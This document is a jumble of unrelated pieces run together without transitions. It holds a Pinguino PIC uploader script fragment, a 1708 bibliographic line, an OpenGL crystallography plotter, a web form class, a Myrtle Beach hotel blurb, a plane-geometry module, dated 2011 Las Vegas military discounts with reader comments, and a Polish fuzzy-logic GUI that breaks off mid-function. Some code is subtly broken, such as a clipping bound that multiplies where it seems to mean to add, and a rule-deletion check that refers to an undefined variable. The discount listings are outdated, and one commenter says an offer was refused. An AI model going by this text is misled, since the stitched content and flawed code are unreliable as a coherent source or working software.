(addr8, addr16) #print("0x%X [%s]" % (addr16, data[index:index+writeBlockSize]) else: status = writeFlash(handle, addr8, data[index:index+writeBlockSize]) if status == ERR_USB_WRITE: return ERR_USB_WRITE #print("0x%X [%s]" % (addr8, data[index:index+writeBlockSize]) data[:] = [] # clear the list print("%d bytes written" % codesize) return ERR_NONE # ---------------------------------------------------------------------- # ---------------------------------------------------------------------- def main(mcu, filename): # ---------------------------------------------------------------------- # ---------------------------------------------------------------------- # check file to upload # ------------------------------------------------------------------ if filename == '': closeDevice(handle) sys.exit("Aborting: no program to write") hexfile = open(filename, 'r') if hexfile == "": sys.exit("Aborting: unable to open %s" % filename) hexfile.close() # 
search for a Pinguino board # ------------------------------------------------------------------ print("Looking for a Pinguino board ...") device = getDevice(VENDOR_ID, PRODUCT_ID) if device == ERR_DEVICE_NOT_FOUND: sys.exit("Aborting: Pinguino not found. Is your device connected and/or in bootloader mode ?") else: print("Pinguino found ...") handle = initDevice(device) #print(handle) if handle == ERR_USB_INIT1: print("... but upload is not possible.") print("Press the Reset button and try again.") sys.exit(0) # find out the processor # ------------------------------------------------------------------ mcu = mcu.lower() device_id, device_rev = getDeviceID(handle, mcu) if device_id == ERR_USB_WRITE: closeDevice(handle) sys.exit("Aborting: unknown device ID") proc = getDeviceName(device_id) if proc == ERR_DEVICE_NOT_FOUND: closeDevice(handle) sys.exit("Aborting: unknown PIC (id=0x%X)" % device_id) elif proc != mcu: closeDevice(handle) sys.exit("Aborting: program compiled for %s but device has %s" % (mcu, proc)) else: print(" - with PIC%s (id=0x%X, rev=%x)" % (proc, device_id, device_rev)) # find out flash memory size # ------------------------------------------------------------------ # lower limit of the flash memory (bootloader offset) # TODO : get it from the bootloader (cf. APPSTART) if ("16f" in proc): memstart = 0x800 else: memstart = 0xC00 # upper limit of the flash memory memend = getDeviceFlash(device_id) memfree = memend - memstart; print(" - with %d bytes free (%.2f/%d KB)" % (memfree, memfree/1024, memend/1024)) print(" from 0x%05X to 0x%05X" % (memstart, memend)) # find out bootloader version # ------------------------------------------------------------------ #product = handle.getString(device.iProduct, 30) #manufacturer = handle.getString(device.iManufacturer, 30) print(" - with USB bootloader v%s" % getVersion(handle)) # start writing # ------------------------------------------------------------------ print("Uploading user program ...") status = hexWrite(handle, filename, proc, memstart, memend) #print status if status == ERR_HEX_RECORD: closeDevice(handle) sys.exit("Aborting: record error") elif status == ERR_HEX_CHECKSUM: closeDevice(handle) sys.exit("Aborting: checksum error") elif status == ERR_USB_ERASE: print("Aborting: erase error") closeDevice(handle) sys.exit(0) elif status == ERR_NONE: print("%s successfully uploaded" % os.path.basename(filename)) # reset and start start user's app. # ------------------------------------------------------------------ resetDevice(handle) # Device can't be closed because it just has been reseted #closeDevice(handle) sys.exit("Starting user program ...") else: sys.exit("Aborting: unknown error") # ---------------------------------------------------------------------- # ---------------------------------------------------------------------- # ---------------------------------------------------------------------- if __name__ == "__main__": print("We use Python v%d.%d + PyUSB.%s" % (sys.version_info[0], sys.version_info[1], "core" if PYUSB_USE_CORE else "legacy")) i = -1 for arg in sys.argv: i = i + 1 if i == 2: main(sys.argv[1], sys.argv[2]) else: sys.exit("Usage ex: uploader8.py 16f1459 tools/Blink1459.hex")
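The checksum rule quoted in hexWrite()'s docstring is easy to check in isolation. Below is a minimal, self-contained sketch (not part of the uploader) that recomputes the two's-complement checksum of an Intel HEX record and verifies it against the example from that docstring:

```python
def intelhex_checksum(record):
    """Return the expected checksum byte for an Intel HEX record.

    `record` is a full line such as ':0300300002337A1E'. Every byte between
    the leading ':' and the stored checksum is summed, and the two's
    complement of the low byte of that sum is the checksum.
    """
    payload = record.strip()[1:-2]          # drop ':' and the stored checksum
    total = sum(int(payload[i:i + 2], 16) for i in range(0, len(payload), 2))
    return (-total) & 0xFF

# 03 + 00 + 30 + 00 + 02 + 33 + 7A = 0xE2 -> two's complement 0x1E
assert intelhex_checksum(":0300300002337A1E") == 0x1E
```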
Original edition: Zurich, printed at the author's expense by the Gessner press, 1708 (Tiguri. Sumtibus authoris, typis gessnerianis. MDCCVIII).
#!/usr/bin/env python from __future__ import print_function """ from example by Tarn Weisner Burton <[email protected]> in pyopengl """ __author__ = 'Jon Wright <[email protected]> from example by Tarn Weisner Burton <[email protected]>' import numpy import sys import os from pyopengltk import Opengl import OpenGL.GL as GL import OpenGL.GLU as GLU if sys.version_info[0] < 3: import Tkinter as Tk else: import tkinter as Tk class myOpengl(Opengl): # Make a parallel projection # mostly copied from Tk.Opengl class with small mods def tkRedraw(self, *dummy): """Cause the opengl widget to redraw itself.""" if not self.initialised: return self.activate() #print self.distance GL.glPushMatrix() # Protect our matrix self.update_idletasks() self.activate() w = self.winfo_width() h = self.winfo_height() GL.glViewport(0, 0, w, h) # Clear the background and depth buffer. GL.glClearColor(self.r_back, self.g_back, self.b_back, 0.) GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT) GL.glMatrixMode(GL.GL_PROJECTION) GL.glLoadIdentity() r = 1.*w/h GL.glOrtho( -self.distance*r, self.distance*r, -self.distance, self.distance, -self.distance*3, self.distance*3) # GLU.gluPerspective(self.fovy, float(w)/float(h), self.near, self.far) GL.glMatrixMode(GL.GL_MODELVIEW) self.redraw(self) GL.glFlush() # Tidy up GL.glPopMatrix() # Restore the matrix # self.tk.call(self._w, 'swapbuffers') self.tkSwapBuffers() class plot3d(Tk.Toplevel): def __init__(self,parent,data=None,lines=None, ubis=None,image=None,pars=None,spline=None): """ Data would be your observed g-vectors. Lines will be a computed lattice """ Tk.Toplevel.__init__(self,parent) self.parent=parent if data is not None: xyz=data.copy() else: xyz=numpy.array([0,0,0]) self.ps=Tk.StringVar() self.ps.set('1.') self.pointsize=1. self.npeaks=xyz.shape[0] self.o = myOpengl(self, width = 400, height = 400) self.o.redraw = self.redraw self.o.autospin_allowed = 1 self.o.fovy=5 self.o.near=1e6 self.o.far=1e-6 import math self.o.distance=3. 
#numpy.maximum.reduce(numpy.ravel(xyz))*4 / \ # math.tan(self.o.fovy*math.pi/180) print(type(xyz),xyz.dtype.char,xyz.shape) self.xyz=xyz f=Tk.Frame(self) Tk.Button(f,text="Help",command=self.o.help).pack(side=Tk.LEFT) Tk.Button(f,text="Reset",command=self.o.reset).pack(side=Tk.LEFT) Tk.Button(f,text="Pointsize",command=self.setps).pack(side=Tk.LEFT) Tk.Entry(f,textvariable=self.ps).pack(side=Tk.LEFT) Tk.Button(f,text="Quit",command=self.goaway).pack(side=Tk.RIGHT) self.dataoff=0 self.o.pack(side = 'top', expand = 1, fill = 'both') f.pack(side=Tk.BOTTOM,expand=Tk.NO,fill=Tk.X) Tk.Label(self,text="Red=[1,0,0] Green=[0,1,0] Blue=[0,0,1]").pack( side=Tk.BOTTOM,expand=Tk.NO,fill=Tk.X) self.ubis=ubis self.color=numpy.ones((xyz.shape[0],3),numpy.float) print(self.color.shape) self.tex=False if ubis is not None: self.ubis = self.readubis(ubis) self.scorecolor(0) if pars is not None: self.tex=True self.readspline(spline) self.readprms(pars) self.readimage(image) self.after(100, self.changedata) def readspline(self,spline): from ImageD11 import blobcorrector self.corrector = blobcorrector.correctorclass(spline) def readubis(self,ubis): from ImageD11 import indexing return indexing.readubis(ubis) def readprms(self,prms): from ImageD11 import parameters o = parameters.parameters() o.loadparameters(prms) self.pars=o.get_parameters() def readimage(self,image): from ImageD11 import transform from fabio import openimage self.imageobj=openimage.openimage(image) # map from 2048x2048 to 1024x1024 d = self.imageobj.data.astype(numpy.float32) mi= d.mean() - d.std()*2 mx= d.mean() * d.std()*2 shape=self.imageobj.data.shape d=numpy.reshape(numpy.clip(self.imageobj.data,mi,mx),shape) # makes a clipped copy d=(255.*(d-mi)/(mx-mi)) # scale intensity print(d.min(),d.max(),d.mean()) self.image=numpy.zeros((1024,1024),numpy.uint8) if d.shape==(2048,2048): # rebin 2x2 im=(d[::2,::2]+d[::2,1::2]+d[1::2,::2]+d[1::2,1::2])/4 self.image=(255-im).astype(numpy.uint8).tostring() self.imageWidth=1024 self.imageHeight=1024 # make a 2D array of x,y p=[] pk=[] step = 64 r=[ [ 0,0 ], [0,step], [step,step], [step,0] ] for i in range(0,1024,step): for j in range(0,1024,step): # i,j 1024x1024 texture coords # x,y spatially corrected for v in r: pk.append([i+v[0],j+v[1]]) x,y = self.corrector.correct((i+v[0])*2 , (j+v[1])*2) # corrected p.append([x,y]) p=numpy.array(p).T pk=numpy.array(pk).T omega=float(self.imageobj.header['Omega']) self.pars['distance']=float(self.pars['distance'])*1000 tth,eta=transform.compute_tth_eta(p,**self.pars) gve = transform.compute_g_vectors(tth,eta,omega*self.pars['omegasign'],self.pars['wavelength']) self.pts = [] print("Setting up image mapping",p.shape,gve.shape) for i in range(pk.shape[1]): self.pts.append([pk[1,i]/1024.,pk[0,i]/1024.,gve[0,i],gve[1,i],gve[2,i]]) #for p in self.pts: # print p self.setupTexture() def setupTexture(self): GL.glDisable(GL.GL_TEXTURE_2D) GL.glPixelStorei(GL.GL_UNPACK_ALIGNMENT, 1) GL.glTexImage2D(GL.GL_TEXTURE_2D,#target 0,#level 3,#internalformat self.imageWidth, self.imageHeight, 0,#border GL.GL_LUMINANCE,#format GL.GL_UNSIGNED_BYTE,# type self.image) GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_WRAP_S, GL.GL_CLAMP) GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_WRAP_T, GL.GL_CLAMP) GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_WRAP_S, GL.GL_REPEAT) GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_WRAP_T, GL.GL_REPEAT) GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MAG_FILTER, GL.GL_NEAREST) GL.glTexParameterf(GL.GL_TEXTURE_2D, 
GL.GL_TEXTURE_MIN_FILTER, GL.GL_NEAREST) GL.glTexEnvf(GL.GL_TEXTURE_ENV, GL.GL_TEXTURE_ENV_MODE, GL.GL_DECAL) GL.glEnable(GL.GL_TEXTURE_2D) GL.glEnable(GL.GL_NORMALIZE) GL.glShadeModel(GL.GL_FLAT) def scorecolor(self,i=0): cc = [ [ 1,0,0] , [0,1,0] , [0,0,1], [1,1,0], [1,0,1], [0,1,1], [ 0.5,0,0] , [0,0.5,0] , [0,0,0.5], [0.5,0.5,0], [0.5,0,0.5], [0,0.5,0.5]] if self.ubis is not None: from ImageD11 import indexing for u,i in zip(self.ubis,list(range(len(self.ubis)))): scores=indexing.calc_drlv2(u,self.xyz) print(self.xyz.shape,scores.shape) ind = numpy.compress( numpy.less(scores,0.02) , numpy.arange(self.xyz.shape[0]) ) print("Grain",i,scores.shape,ind.shape) for j in range(3): c=numpy.ones(self.color.shape[0]) numpy.put(c,ind,cc[i%len(cc)][j]) self.color[:,j]*=c def go(self): """ Allow the toplevel to return a handle for changing data """ self.o.mainloop() def goaway(self): print("Called goaway") self.o.destroy() self.destroy() if self.parent is None: sys.exit() print("Ought to be gone now...") def changedata(self,xyz=None): if xyz is not None: self.xyz=xyz.copy() self.npeaks=xyz.shape[0] GL.glDisableClientState(GL.GL_VERTEX_ARRAY) GL.glDisableClientState(GL.GL_COLOR_ARRAY) GL.glVertexPointer( 3, GL.GL_FLOAT, 0, self.xyz.astype(numpy.float32).tostring() ) GL.glColorPointer( 3, GL.GL_FLOAT, 0, self.color.astype(numpy.float32).tostring() ) GL.glEnableClientState(GL.GL_VERTEX_ARRAY) GL.glEnableClientState(GL.GL_COLOR_ARRAY) self.o.tkRedraw() def setps(self): self.pointsize=float(self.ps.get()) self.o.tkRedraw() def redraw(self,o): GL.glDisable(GL.GL_LIGHTING) GL.glClearColor(0., 0., 0., 0) GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT) GL.glColor3f(1.0, 1.0, 1.0) # white GL.glPointSize(self.pointsize) GL.glDrawArrays(GL.GL_POINTS, 0, self.npeaks ) if self.ubis is not None and len(self.ubis)==1: hkl = numpy.dot(numpy.linalg.inv(self.ubis[0]), numpy.identity(3,numpy.float)).T # print hkl else: hkl = numpy.identity(3,numpy.float) # print hkl GL.glBegin(GL.GL_LINE_LOOP) GL.glColor3f(1.0, 0.0, 0.0) # red GL.glVertex3f(0.,0.,0.) GL.glVertex3f(hkl[0][0],hkl[0][1],hkl[0][2]) GL.glEnd() GL.glBegin(GL.GL_LINE_LOOP) GL.glColor3f(0.0, 1.0, 0.0) # green GL.glVertex3f(0.,0.,0.) GL.glVertex3f(hkl[1][0],hkl[1][1],hkl[1][2]) GL.glEnd() GL.glBegin(GL.GL_LINE_LOOP) GL.glColor3f(0.0, 0.0, 1.0) # blue GL.glVertex3f(0.,0.,0.) 
GL.glVertex3f(hkl[2][0],hkl[2][1],hkl[2][2]) GL.glEnd() if self.tex: # print "drawing images" GL.glEnable(GL.GL_TEXTURE_2D) GL.glColor4f(.0, 1.0, .0, 1.0) # red GL.glBegin(GL.GL_QUADS) # generate a grid of squares to map the texture in 3D # opengl has better "map" methods to do this for i,j,g1,g2,g3 in self.pts: # print i,j,g1,g2,g3 GL.glTexCoord2f(i,j) GL.glVertex3f(g1, g2, g3) GL.glEnd() # GL.glDisable(GL.GL_TEXTURE_2D) GL.glFlush() GL.glEnable(GL.GL_LIGHTING) if __name__=="__main__": try: lines=open(sys.argv[1],"r").readlines() except: print("Usage %s gvector_file [ubifile] [image parfile]"%(sys.argv[0])) raise # sys.exit() on=0 xyz=[] for line in lines: if on==1: try: vals=[float(x) for x in line.split()] xyz.append( [ vals[0],vals[1],vals[2] ]) except: pass if line.find("xr yr zr")>0 or line.find("gx gy gz ")>0: on=1 xyz=numpy.array(xyz) if len(xyz) == 0 and lines[0][0]=="#": from ImageD11 import columnfile c = columnfile.columnfile( sys.argv[1] ) xyz = numpy.array( (c.gx, c.gy, c.gz )).T npeaks = len(xyz) if len(sys.argv)==3: o=plot3d(None,data=xyz,ubis=sys.argv[2]) elif len(sys.argv)==6: o=plot3d(None,data=xyz,ubis=sys.argv[2],image=sys.argv[3],pars=sys.argv[4],spline=sys.argv[5]) else: o=plot3d(None,data=xyz,ubis=None) def runit(): o.changedata(o.xyz) o.after(100, runit ) o.mainloop()
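The readimage() method above squeezes a 2048x2048 detector frame into a 1024x1024 8-bit texture by clipping the intensities and averaging 2x2 blocks. A standalone sketch of that step follows; note the original computes `mx = d.mean() * d.std()*2`, which reads as if an addition was intended, and the sketch assumes the additive form.

```python
import numpy as np

def frame_to_texture(frame):
    """Clip a detector frame to mean +/- 2*std, scale to 0..255 and
    rebin 2048x2048 -> 1024x1024 by averaging 2x2 blocks (cf. readimage)."""
    d = frame.astype(np.float32)
    lo = d.mean() - 2 * d.std()
    hi = d.mean() + 2 * d.std()            # assumed '+'; the original multiplies
    d = 255.0 * (np.clip(d, lo, hi) - lo) / (hi - lo)
    small = (d[::2, ::2] + d[::2, 1::2] + d[1::2, ::2] + d[1::2, 1::2]) / 4
    return (255 - small).astype(np.uint8)  # inverted grey scale, as in the original

tex = frame_to_texture(np.random.poisson(100, (2048, 2048)).astype(np.float32))
print(tex.shape, tex.dtype)                # (1024, 1024) uint8
```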
from colander import Length from deform import Button from deform.widget import HiddenWidget, Select2Widget, TextAreaWidget from ekklesia_common.contract import Form, Schema, enum_property, int_property, string_property from ekklesia_common.translation import _ from ekklesia_portal.enums import VoteByUser class PropositionNoteSchema(Schema): proposition_id = string_property(title=_('proposition_id'), missing=None) user_id = int_property(title=_('user_id'), missing=None) notes = string_property(title=_('notes'), validator=Length(min=0, max=2048), missing=None) vote = enum_property(VoteByUser, title=_('vote'), missing=VoteByUser.UNSURE) class PropositionNoteForm(Form): def __init__(self, request, action): super().__init__(PropositionNoteSchema(), request, action, buttons=[Button(title=_("submit"))]) def prepare_for_render(self, items_for_selects): self.set_widgets({ 'proposition_id': HiddenWidget(), 'user_id': HiddenWidget(), 'notes': TextAreaWidget(rows=8, missing=None), 'vote': Select2Widget(values=items_for_selects['vote']) })
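For a rough idea of how a view might drive this form, here is a hedged sketch; `request`, the action URL and the (value, label) pairs fed to the vote widget are placeholders, not part of the module:

```python
# hypothetical wiring from a view; `request` is whatever the framework passes in
def render_note_form(request, proposition_id, user_id):
    form = PropositionNoteForm(request, action='/propositions/%s/note' % proposition_id)
    items_for_selects = {
        'vote': [(v.name, v.name) for v in VoteByUser]   # assumed label choice
    }
    form.prepare_for_render(items_for_selects)
    return form.render()   # deform renders the HTML for the template
```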
Located at 68th Avenue North in Myrtle Beach, Monteray Bay Suites is right on the beach and close to many of the most exciting attractions, shopping destinations, and dining establishments in the city. Just a five-mile drive from visitor favorites like Broadway at the Beach, the Myrtle Beach Boardwalk, and the Tanger Outlet Mall, Monteray Bay offers you a superb location and fabulous amenities. As an oceanfront resort, Monteray Bay provides easy beach access for all guests, so you can spend as much time as you'd like on the sandy shores of the Myrtle Beach coast. Stay cool in the summer by taking a dip in the outdoor, oceanfront pool, featuring lounge chairs and a relaxing pool deck. Experience the fun of the indoor pool area, where you can find kiddie pools, a lazy river, and a hot tub as well! You can even take your swimming to new heights with the exquisite rooftop pool. Finally, a cardio center featuring treadmills, elliptical machines, and a weight station is available for guest use. Monteray Bay offers guests numerous amenities, fantastic ocean views, and beach access, all while in an area central to the most-loved attractions in Myrtle Beach.
# -*- coding: utf-8 -*- """ Provide functions for the creation and manipulation of Planes. Planes are represented using a numpy.array of shape (4,). The values represent the plane equation using the values A,B,C,D. The first three values are the normal vector. The fourth value is the distance of the plane from the origin, down the normal. .. seealso: http://en.wikipedia.org/wiki/Plane_(geometry) .. seealso: http://mathworld.wolfram.com/Plane.html """ from __future__ import absolute_import, division, print_function import numpy as np from math3 import vector from math3.utils import all_parameters_as_numpy_arrays, parameters_as_numpy_arrays def create(normal=None, distance=0.0, dtype=None): """Creates a plane that runs along the X,Y plane. It crosses the origin with a normal of 0,0,1 (+Z). :rtype: numpy.array :return: A plane that runs along the X,Y plane. """ if normal is None: normal = [0.0, 0.0, 1.0] return np.array([normal[0], normal[1], normal[2], distance], dtype=dtype) @parameters_as_numpy_arrays('vector1', 'vector2', 'vector3') def create_from_points(vector1, vector2, vector3, dtype=None): """Create a plane from 3 co-planar vectors. The vectors must all lie on the same plane or an exception will be thrown. The vectors must not all be in a single line or the plane is undefined. The order the vertices are passed in will determine the normal of the plane. :param numpy.array vector1: a vector that lies on the desired plane. :param numpy.array vector2: a vector that lies on the desired plane. :param numpy.array vector3: a vector that lies on the desired plane. :raise ValueError: raised if the vectors are co-incident (in a single line). :rtype: numpy.array :return: A plane that contains the 3 specified vectors. """ dtype = dtype or vector1.dtype # make the vectors relative to vector2 relV1 = vector1 - vector2 relV2 = vector3 - vector2 # cross our relative vectors normal = np.cross(relV1, relV2) if np.count_nonzero(normal) == 0: raise ValueError("Vectors are co-incident") # create our plane return create_from_position(position=vector2, normal=normal, dtype=dtype) @parameters_as_numpy_arrays('position', 'normal') def create_from_position(position, normal, dtype=None): """Creates a plane at position with the normal being above the plane and up being the rotation of the plane. :param numpy.array position: The position of the plane. :param numpy.array normal: The normal of the plane. Will be normalised during construction. :rtype: numpy.array :return: A plane that crosses the specified position with the specified normal. """ dtype = dtype or position.dtype # -d = a * px + b * py + c * pz n = vector.normalise(normal) d = -np.sum(n * position) return create(n, d, dtype) def create_xy(invert=False, distance=0., dtype=None): """Create a plane on the XY plane, starting at the origin with +Z being the up vector. The distance is the distance along the normal (-Z if inverted, otherwise +Z). """ invert = -1. if invert else 1. return np.array([0., 0., 1. * invert, distance]) def create_xz(invert=False, distance=0., dtype=None): """Create a plane on the XZ plane, starting at the origin with +Y being the up vector. The distance is the distance along the normal (-Y if inverted, otherwise +Y). """ invert = -1. if invert else 1. return np.array([0., 1. * invert, 0., distance]) def create_yz(invert=False, distance=0., dtype=None): """Create a plane on the YZ plane, starting at the origin with +X being the up vector. The distance is the distance along the normal (-X if inverted, otherwise +X). """ invert = -1. 
if invert else 1. return np.array([1. * invert, 0., 0., distance]) def invert_normal(plane): """Flips the normal of the plane. The plane is **not** changed in place. :rtype: numpy.array :return: The plane with the normal inverted. """ # flip the normal, and the distance return -plane def position(plane): """Extracts the position vector from a plane. This will be a vector co-incident with the plane's normal. :param numpy.array plane: The plane. :rtype: numpy.array :return: A valid position that lies on the plane. """ return plane[:3] * plane[3] def normal(plane): """Extracts the normal vector from a plane. :param numpy.array plane: The plane. :rtype: numpy.array :return: The normal vector of the plane. """ return plane[:3].copy()
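A quick check of the [A, B, C, D] convention described in the module docstring (assuming the module is importable, e.g. `from math3 import plane`; here the functions are called directly):

```python
import numpy as np

# three non-collinear points on the plane z = 5
p1 = np.array([0.0, 0.0, 5.0])
p2 = np.array([1.0, 0.0, 5.0])
p3 = np.array([0.0, 1.0, 5.0])

pl = create_from_points(p1, p2, p3)
print(normal(pl))                  # +/-[0, 0, 1], sign depends on the winding of the points
print(pl[3])                       # the distance term, built here as d = -normal . point
print(normal(invert_normal(pl)))   # the same normal, flipped
```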
Vegas Values: Thanking Our Troops ‘N More! Weekend-long party May 27-30 includes UFC 130 viewing on Saturday, May 28. Food & drink specials range include two tacos, a Tecate draft and a shot of tequila for $20. Complimentary admission to resort pools May 27-30. Live DJs, 2-for-1 drink voucher with valid military ID. “Holly’s World” star Angel Porrino and son Roman host Family Fun Memorial Day Weekend May 27-31. Mandalay Bay The Go-Go’s concert on the beach, May 27, tickets are $27.50. Rok Vegas at NYNY hosts Vanilla Ice May 28, doors at 10pm, $20+ men, $10+ women. Nina Blackwood’s Absolutely 80s Summer Music Fest begins Memorial Day Weekend. Free concert by Terri Nunn & Berlin, May 28 at 9pm. “Holly’s World” co-star Laura Croft hosts bikini fashion show on May 29. Marquee Dayclub at Cosmopolitan welcomes Fatboy Slim May 29, doors at 10am $60 men, $20 women. Jubilee!, the longest-running show on the Las Vegas Strip, has an ongoing two-for-one ticket discount. Comedian George Wallace is offering free show tickets throughout the month of May. Comedian Vinnie Favorito has an ongoing half price ticket offer. Flamingo Spa is offering 20% off all spa treatments. Defending the Caveman is offering free show tickets, up to two per veteran throughout the month of May. Additional tickets can be purchased at a two-for-one discount. Legends in Concert has an ongoing half price ticket offer. Harrah’s Spa is offering 20% off all spa treatments. The over-the-top production of Frank Marino’s Divas Las Vegas, has an ongoing half price ticket offer. Matsuri, “the Strip’s biggest afternoon show” is offering a $10 general admission ticket and $15 VIP ticket through Memorial Day. Imperial Palace Spa is offering 20% off all spa treatments. Hypnotist Anthony Cools has an ongoing two-for-one ticket discount. Rio Spa & Salon is offering 30% off all spa treatments. Cravings is offering a complimentary buffet for all active duty and retired military personnel with ID. Saturday, May 28 and Sunday, May 29 only. Terry Fator 40% discount with military ID. Military discount ranges from 20% to 50%, depending on show. Call 702-792-7777 for more details. Outstanding line-up of activities this weekend! I called Mirage to confirm the buffet offer just 20 mins. ago. The buffet manager told me he had no idea what I was talking about and there are not offering any discounts or free meal for veterans. Too bad. Charlene, Thanks for the update — Unfortunately, Kellee wrote this article in 2011 and lots of things can change in our town in two years!
#!/usr/bin/env python3 """ author: Kamil Cukrowski, 2016 """ from tkinter import * import tkinter import tkinter.ttk from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg import matplotlib.pyplot as plt from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg, NavigationToolbar2TkAgg import numpy as np import inference import fuzzy_sets from matplotlib import cm import random class guiOnButtonDefuzyfikacja(tkinter.Tk): def __init__(self, parent): self.parent = parent def show(self, frame): self.frame = frame self.parent.resetFrame(frame) ## interfere_functext = self.convertInferenceFuncToText(self.parent.ruleset.inference_func) ## f = Frame(frame) f.place(in_=frame, anchor="c", relx=.5, rely=.5) ## l=tkinter.Label(f, text='Deffuzifikacja aktualna: '+interfere_functext, justify=LEFT) l.grid(row=0,column=0,columnspan=3) ## tkinter.Label(f, text='Ustaw deffuzifikacje: ').grid(row=1,column=0) list=['COG','LOM','MOM','FOM'] inference_func = StringVar() inference_func.set(interfere_functext) tkinter.OptionMenu(f,inference_func,*list).grid(row=1,column=1) ## b=tkinter.Button(f, text="Ustaw", command= lambda: self.OnButtonRegulyOdswierz(inference_func.get())) b.grid(row=1,column=2) def OnButtonRegulyOdswierz(self,text): self.parent.ruleset.inference_func = self.convertTextToInferenceFunc(text) self.show(self.frame) def convertTextToInferenceFunc(self, text): if ( text == 'COG' ): return inference.cog if ( text == 'MOM' ): return inference.mom if ( text == 'LOM' ): return inference.lom if ( text == 'FOM' ): return inference.fom raise ValueError('unexistent inference function : '+text) def convertInferenceFuncToText(self, inference_func): if ( inference_func == inference.cog ): return 'COG' if ( inference_func == inference.mom ): return 'MOM' if ( inference_func == inference.lom ): return 'LOM' if ( inference_func == inference.fom ): return 'FOM' raise ValueError('unexistent inference function : '+inference_func) class guiOnButtonReguly(tkinter.Tk): def __init__(self, parent): self.parent = parent def show(self, frame): self.parent.resetFrame(frame) self.frame = frame ## frame.update() top = Frame(frame, width = frame.winfo_width(), height = frame.winfo_height()-50) top.pack(side=TOP, fill=BOTH, expand=True) b1 = Frame(frame, width = frame.winfo_width(), height = 20) b1.pack(side=BOTTOM, fill=X) b1.pack_propagate(False) b2 = Frame(frame, width = frame.winfo_width(), height = 20) b2.pack(side=BOTTOM, fill=X) b2.pack_propagate(False) ## tkinter.Label(top, text='Reguły:').pack() view = Frame(top) view.pack(fill=BOTH, expand=True) S = Scrollbar(view) T = Text(view, width=1000) S.pack(side=RIGHT, fill=BOTH, expand=True) T.pack(side=LEFT, fill=BOTH, expand=True) S.config(command=T.yview) T.config(yscrollcommand=S.set) self.T = T self.refreshText() ## tkinter.Label(b1, text='Usuń regułę numer: ').pack(side=LEFT) e = StringVar(); e.set('1'); tkinter.Entry(b1, textvariable=e).pack(side=LEFT) tkinter.Button(b1, text='usuń', command= lambda: self.onButtonUsunRegule(e)).pack(side=LEFT) ## tkinter.Label(b2, text='Jeśli prędkość jest ').pack(side=LEFT) v1 = self.addOptionMenu(b2, self.parent.dom_predkosc); tkinter.Label(b2, text=' i widocznosc jest ').pack(side=LEFT) v2 = self.addOptionMenu(b2, self.parent.dom_widocznosc); tkinter.Label(b2, text=' i przyczepnosc jest ').pack(side=LEFT) v3 = self.addOptionMenu(b2, self.parent.dom_przyczepnosc); tkinter.Label(b2, text=' to ryzyko jest ').pack(side=LEFT) v4 = self.addOptionMenu(b2, self.parent.dom_ryzyko); tkinter.Button(b2, text='dodaj 
regułę',command= lambda: self.onButtonDodajRegule(v1.get(),v2.get(),v3.get(),v4.get())).pack(side=LEFT) def refreshText(self): self.T.delete("1.0", END) self.T.insert(END, self.rulesString()) def addOptionMenu(self, frame, domain): list_=[] for fuzzyset in domain.fuzzy_sets: list_.append(fuzzyset.name) var = StringVar() var.set(list_[0]) tkinter.OptionMenu(frame,var,*list_).pack(side=LEFT) return var def onButtonDodajRegule(self, predkosc, widocznosc, przyczepnosc, ryzyko): self.parent.ruleset.add_rule_in_order([predkosc,widocznosc,przyczepnosc,ryzyko]) self.refreshText() def onButtonUsunRegule(self, entry): num = int(entry.get()); if num < 1 | num > len(ruleset.rules): return del self.parent.ruleset.rules[num-1] self.refreshText() def rulesString(self): ruleset = self.parent.ruleset string="" for j in range(len(ruleset.rules)): rule = ruleset.rules[j] string += '%2d'%(j+1)+". Jeśli " for i in range(len(ruleset.domains)-1): string += ruleset.domains_list[i].linguistic_name+" jest "+rule.input_sets[i].name + " i " string = string[:-3]; # remove last ' i ' i=-1; string += " to "+ruleset.domains_list[i].linguistic_name+" jest "+rule.output_set.name+'\n'; return string class guiOnButtonFPrzynaleznosci(tkinter.Tk): def __init__(self, parent): self.parent = parent ## self.fuzzyName = "" self.fuzzyNameList = "" ## self.fuzzyTypeList=[] for type in ['trójkątna', 'prostokątna', 'trapezowa', 'Guassa']: self.fuzzyTypeList.append(type) self.fuzzyType = StringVar() self.fuzzyType.set(self.fuzzyTypeList[0]) ## self.values=[] for i in [0,1,2,3]: e = StringVar() e.set('0') self.values.append( e ) def show(self, frame, dom): self.frame = frame self.dom = dom ## self.parent.resetFrame(frame) ## self.fuzzyNameList=[] for fuzzyset in dom.fuzzy_sets: self.fuzzyNameList.insert(0,fuzzyset.name) self.fuzzyName = StringVar() self.fuzzyName.set(self.fuzzyNameList[0]) ## frame.update() top = Frame(frame, width = frame.winfo_width(), height = frame.winfo_height()-50) top.pack(side=TOP, fill=BOTH) top.pack_propagate(False) bottom = Frame(frame, width = frame.winfo_width(), height = 50) bottom.pack(side=BOTTOM, fill=BOTH) top.pack_propagate(False) # nasz plot fig = plt.Figure(figsize=(15,15), dpi=60) subplot = fig.add_subplot(1,1,1) dom.addPlotsToSubplot(subplot) canvas = FigureCanvasTkAgg(fig, top) toolbar = NavigationToolbar2TkAgg(canvas, top) toolbar.pack(side=TOP, fill=BOTH) canvas.get_tk_widget().pack(side=BOTTOM, fill=BOTH) # i dziubki do edycji! 
